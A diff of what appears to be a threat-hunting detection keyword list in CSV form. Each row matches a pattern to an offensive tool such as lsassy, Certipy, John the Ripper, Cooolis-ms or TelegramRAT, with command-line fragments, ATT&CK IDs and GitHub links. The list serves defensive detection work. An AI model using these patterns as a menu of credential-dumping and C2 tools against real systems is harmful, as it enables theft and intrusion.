+"*lsassy-MacOS-x64-*","offensive_tool_keyword","lsassy","Extract credentials 
from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*lsassy-windows-x64-*.exe","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*lse.sh -l*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*luckystrike.ps1*","offensive_tool_keyword","luckystrike","A PowerShell based utility for the creation of malicious Office macro documents.","T1566 - T1059 - T1027","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/curi0usJack/luckystrike","1","1","N/A","N/A","10","1084","250","2017-11-03T17:52:13Z","2016-09-22T18:57:50Z" "*LUgsLS1IT1NU*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*luijait/PwnKit*","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","79","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" -"*luks2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*lures create *","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1308","237","2023-09-13T23:44:48Z","2022-09-07T02:47:43Z" +"*luks2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline 
password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*lures create *","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" "*LVAsLS1QT1JU*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*LW8sLS1vcHRpb25z*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit 
Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*LWIsLS1idWNrZXQ=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" 
@@ -13313,8 +13470,8 @@
 "*LXAsLS1waWQ=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z"
 "*LXAsLS1wYXlsb2Fk*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z"
 "*LXUsLS11cmk=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z"
-"*ly4k/Certipy*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","535","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z"
-"*ly4k/Certipy*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z"
+"*ly4k/Certipy*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","536","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z"
+"*ly4k/Certipy*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z"
 "*ly4k/PassTheChallenge*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z"
 "*lyncsmash*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations","T1580 - T1201 - T1071 - T1110 - T1078","TA0043 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z"
 "*lyncsmash.git*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z"
@@ -13322,25 +13479,25 @@
 "*lyncsmash.py*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z"
 "*lyncsmash-master*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z"
 "*LyncSniper*","offensive_tool_keyword","LyncSniper","LyncSniper is a tool for penetration testing Lync and Skype for Business deployments hosted either on premise or in Office 365","T1566 - T1574 - T1210 - T1596","TA0002 - TA0011 - TA0009","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/LyncSniper","1","0","N/A","N/A","1","9","3","2017-04-11T08:38:28Z","2017-06-12T10:56:58Z"
-"*-m * -d * -w * --top-web-ports*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","4","375","50","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z"
-"*-m dumpert *","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z"
-"*-M handlekatz -o *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z"
+"*-m * -d * -w * --top-web-ports*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z"
+"*-m dumpert *","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*-M handlekatz -o *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*M.i.m.i.k.a.t.z*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
 "*m00zh33/golang_c2*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z"
 "*m0rv4i/SharpCookieMonster*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z"
 "*m3f157O/combine_harvester*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z"
-"*m4ll0k/SecretFinder*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1524","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z"
+"*m4ll0k/SecretFinder*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z"
 "*MAAD_Attack.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
 "*MAAD_Config.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
 "*MAAD_Mitre_Map.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
 "*MAADInitialization.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
-"*mac.changer on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
-"*mac_dirty_cow.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*mac2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*mac2john-alt.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*mac.changer on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*mac_dirty_cow.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*mac2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*mac2john-alt.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*MaccaroniC2.git*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z"
 "*macchanger -r*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","0","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z"
-"*MaceTrap.exe*","offensive_tool_keyword","macetrap","MaceTrap is a proof-of-concept for time stomping using SetFileTime. MaceTrap allows you to set the CreationTime / LastAccessTime / LastWriteTime for arbitrary files and folders","T1070.004","TA0040","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/MaceTrap","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z"
+"*MaceTrap.exe*","offensive_tool_keyword","macetrap","MaceTrap is a proof-of-concept for time stomping using SetFileTime. MaceTrap allows you to set the CreationTime / LastAccessTime / LastWriteTime for arbitrary files and folders","T1070.004","TA0040","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/MaceTrap","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z"
 "*machine1337/TelegramRAT*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z"
 "*macro_pack*","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1566.001 - T1564.001 - T1564.003","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","1950","404","2022-05-12T13:30:29Z","2017-10-03T18:30:06Z"
 "*MacroDetectSandbox.vbs*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z"
@@ -13351,189 +13508,190 @@
